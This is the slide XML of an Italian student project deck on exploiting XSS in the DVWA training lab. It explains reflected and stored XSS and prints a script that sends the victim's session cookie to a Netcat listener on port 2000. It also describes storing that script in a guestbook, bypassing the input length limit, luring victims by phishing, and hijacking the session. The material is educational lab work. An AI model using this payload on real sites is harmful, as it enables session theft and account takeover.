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49893" y="3857625"/>
            <a:ext cx="9357222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Open Sauce"/>
              </a:rPr>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="10199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>CSRF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24437" y="9248775"/>
            <a:ext cx="3140289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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>Mattia Chiriatti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5673" y="523875"/>
            <a:ext cx="348376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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>Progetto S6/L5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4833" y="4591050"/>
            <a:ext cx="10898787" cy="2712147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2712147" w="10898787">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10898788" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10898788" y="2712147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="271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574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57040" y="5548606"/>
            <a:ext cx="3074491" cy="276796"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="809743" cy="729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9743" cy="72901"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="72901" w="809743">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="809743" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809743" y="72901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="729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09743" cy="111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9253297" y="6372280"/>
            <a:ext cx="2519715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23457" y="713335"/>
            <a:ext cx="7847688" cy="2701281"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2701281" w="7847688">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7847688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7847688" y="2701282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2701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502" y="843039"/>
            <a:ext cx="6635029" cy="823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 - Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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In questa sezione bonus, vediamo come ho reso Windows 11 la macchina vittima e come ho preso possesso del suo cookie di sessione:</a:t>
            </a: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Lo stesso script usato in precedenza è stato salvato sul database;</a:t>
            </a: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Sul prompt, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> schermo comparirà il codice identificativo di sessione del cookie di Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="324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0123457" y="2171417"/>
            <a:ext cx="7379476" cy="912229"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1943566" cy="2402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43566" cy="240258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="240258" w="1943566">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1943566" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943566" y="240258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2402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43566" cy="278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594227" y="2278238"/>
            <a:ext cx="33269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Canva Sans Bold"/>
              </a:rPr>
              <a:t>Script Malevolo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725111"/>
            <a:ext cx="8911340" cy="2067431"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2067431" w="8911340">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8911340" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8911340" y="2067431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2067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171750"/>
            <a:ext cx="8911340" cy="1320761"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1320761" w="8911340">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8911340" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8911340" y="1320761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13207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6588" y="779328"/>
            <a:ext cx="8747412" cy="811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 - Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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Copiamo il codice di sessione di Windows proposto nella slide precedente e apriamo nuovamente la console sul browser di Kali, tramite la funzione “inspect” della pagina web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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Clicchiamo sulla sezione “storage” e andiamo a cambiare il codice identificativo del cookie del pc attaccante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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In questo modo, l’attacco XSS Stored è completo e, in questo caso, la sessione del pc attaccante avrà gli stessi dati di navigazione del pc vittima come risultato del furto di cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="32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103873" y="1532941"/>
            <a:ext cx="442674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</a:rPr>
              <a:t>Cookie di Windows - Vittima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89863" y="4662170"/>
            <a:ext cx="653891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</a:rPr>
              <a:t>Cookie di Windows copiato nella console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</a:rPr>
              <a:t>di Kali - Attaccante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56092" y="1818697"/>
            <a:ext cx="8628544" cy="2865449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2865449" w="8628544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8628544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8628544" y="2865449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28654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56092" y="5869987"/>
            <a:ext cx="8628544" cy="2353239"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2353239" w="8628544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8628544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8628544" y="2353239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2353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75942" y="7430218"/>
            <a:ext cx="1557628" cy="424154"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="410239" cy="1117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0239" cy="111711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="111711" w="410239">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410239" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410239" y="111711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1117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0239" cy="149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6588" y="784091"/>
            <a:ext cx="8747412" cy="810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Come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comprendere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> la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vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> di un sito?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="7920"/>
              </a:lnSpc>
            </a:pP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Per capire se un sito è vulnerabile da un punto di vista di XSS, basta inserire un piccolo script come ad esempio quello nell‘immagine in alto a destra.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
            </a:pP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Se lo script entra effettivamente in azione, avremo una visualizzazione simile a quella nella figura in basso a destra, dove la scritta compare in corsivo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
            </a:pP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Open Sauce"/>
              </a:rPr>
              <a:t>Questo è il segnale che il sito in questione è vulnerabile a possibili attacchi informatici.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1534" y="2734940"/>
            <a:ext cx="6977766" cy="4604552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4604552" w="6977766">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6977766" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6977766" y="4604552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4604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6588" y="98504"/>
            <a:ext cx="8747412" cy="986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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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XSS è una famiglia di vulnerabilità che consentono a un potenziale attaccante di prendere il totale controllo di una Web APP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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Esistono 3 tipi di attacchi XSS:</a:t>
            </a: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- XSS Reflected</a:t>
            </a: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- XSS Stored</a:t>
            </a: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- XSS DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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In questo progetto, ci occuperemo dei primi due tipi, dove il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> avviene quando il payload malevolo viene trasferito dalla richiesta GET del browser della vittima al sito vulnerabile in maniera temporanea.</a:t>
            </a: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Lo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>, invece, prevede il salvataggio permanente del payload malevolo nel sito vulnerabile.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Open Sauc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9226" y="3495137"/>
            <a:ext cx="8432956" cy="2191825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2191825" w="8432956">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8432955" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8432955" y="2191826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2191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44137" y="7007108"/>
            <a:ext cx="5637875" cy="1728193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1728193" w="5637875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5637875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5637875" y="1728193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17281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339009" y="526331"/>
            <a:ext cx="8389318" cy="2313277"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2209532" cy="6092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09532" cy="609258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="609258" w="2209532">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2209532" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209532" y="609258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6092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09532" cy="647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6588" y="936491"/>
            <a:ext cx="8747412" cy="78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 - Reflected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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Attestata la vulnerabilità, implementiamo lo script in alto a destra nella sezione apposita del sito vulnerabile per ottenere il suo cookie di sessione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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Prima di avviare lo script, mettiamo in ascolto la macchina attaccante con l‘ausilio di Netcat sulla porta 2000, ovvero la porta di riferimento per la macchina vittima, come nella figura a destra in basso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="32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06443"/>
            <a:ext cx="8747412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9179FA"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;var xhr = new XMLHttpRequest(); xhr.open('GET', `http://localhost:2000/${document.cookie}`, false); xhr.send(null);&lt;/script&gt;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360605"/>
            <a:ext cx="8895298" cy="3123890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3123890" w="8895298">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8895298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8895298" y="3123889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="312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6" t="0" r="-27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26801" y="4716750"/>
            <a:ext cx="3566968" cy="426750"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="939448" cy="1123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9448" cy="112395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="112395" w="939448">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="939448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939448" y="112395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1123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39448" cy="1504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6588" y="1374641"/>
            <a:ext cx="8592848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 - Reflected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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Netcat, in questo caso, ci fornirà direttamente il cookie di sessione, che potremo andare a sfruttare per effettuare l‘attacco.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="348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Per un attacco efficace, l‘utente della macchina vittima dovrà interagire con il link malevolo, magari con l‘ausilio di una campagna di phishing apposita.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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1454" y="1861710"/>
            <a:ext cx="8492956" cy="2311692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2311692" w="8492956">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8492956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8492956" y="2311692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2311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6993" y="5306630"/>
            <a:ext cx="8507417" cy="2474885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2474885" w="8507417">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8507417" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8507417" y="2474885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24748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73984" y="6073484"/>
            <a:ext cx="5066658" cy="1196977"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1334428" cy="315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4428" cy="315253"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="315253" w="1334428">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1334428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334428" y="315253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="315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34428" cy="35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6588" y="2093778"/>
            <a:ext cx="8747412" cy="548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 - Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="7920"/>
              </a:lnSpc>
            </a:pP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Come primo passo, verifichiamo che il sito sia vulnerabile.</a:t>
            </a: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Inseriamo un commento nel Guestbook del sito e poi andiamo ad analizzare la console.</a:t>
            </a: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Se nella console è visibile il commento che abbiamo lasciato, allora il sito sarà vulnerabile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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67260" y="2773825"/>
            <a:ext cx="8664858" cy="2067916"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2067916" w="8664858">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8664858" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8664858" y="2067916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2067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839077" y="3514820"/>
            <a:ext cx="1700584" cy="585926"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="447890" cy="1543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7890" cy="154318"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="154318" w="447890">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="447890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447890" y="154318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1543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7890" cy="1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367260" y="5405117"/>
            <a:ext cx="8664858" cy="2613211"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2613211" w="8664858">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8664858" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8664858" y="2613211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26132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6588" y="1655628"/>
            <a:ext cx="8747412" cy="636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 - Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="7920"/>
              </a:lnSpc>
            </a:pP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Essendo l’attacco Stored permanente, procediamo a inserire lo script che verrà richiamato ogni qual volta che un utente interagirà con la sezione del sito vulnerabile.</a:t>
            </a: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Avendo un massimo di 50 caratteri, in caso di uno script più corposo come quello che andremo a utilizzare, dalla console si può modificare il numero massimo di caratteri da inserire nella casella di testo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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58533" y="5143500"/>
            <a:ext cx="10898787" cy="2609104"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2609104" w="10898787">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10898788" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10898788" y="2609104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26091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387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67697" y="6000177"/>
            <a:ext cx="3074491" cy="276796"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="809743" cy="729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9743" cy="72901"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="72901" w="809743">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="809743" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809743" y="72901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="729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09743" cy="111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9263954" y="6682131"/>
            <a:ext cx="2519715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309632" y="1889769"/>
            <a:ext cx="7847688" cy="2701281"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2701281" w="7847688">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7847689" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7847689" y="2701281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2701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0719" y="552450"/>
            <a:ext cx="6635029" cy="870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Open Sauce"/>
              </a:rPr>
              <a:t>Attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>XSS - Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="792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Inserito lo script, una volta premuto “submit” potremo osservare due cose:</a:t>
            </a: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Lo script viene salvato sul database, senza che lo stesso sia esplicitato;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="626183" indent="-313092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Sul prompt, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> schermo comparirà il codice identificativo di sessione del cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3480"/>
              </a:lnSpc>
            </a:pP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Open Sauce"/>
              </a:rPr>
              <a:t>L’attacco XSS Stored è funzionante e pronto a rubare i cookie a tutte le possibili vittime.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309632" y="3347850"/>
            <a:ext cx="7379476" cy="912229"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1943566" cy="2402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43566" cy="240258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="240258" w="1943566">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1943566" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943566" y="240258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2402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43566" cy="278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780402" y="3454672"/>
            <a:ext cx="33269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Canva Sans Bold"/>
              </a:rPr>
              <a:t>Script Malevolo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4155032" y="-1664506"/>
            <a:ext cx="16461989" cy="12511111"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path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83648" y="3305175"/>
            <a:ext cx="8120705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Open Sauce"/>
              </a:rPr>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="10199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="9179FA"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>CSRF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41466" y="6335999"/>
            <a:ext cx="420506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Open Sauce"/>
              </a:rPr>
              <a:t>Bonus!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DAF6UPziONg</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>The Benefits of 5G Technology</dc:title>
</cp:coreProperties>
</file>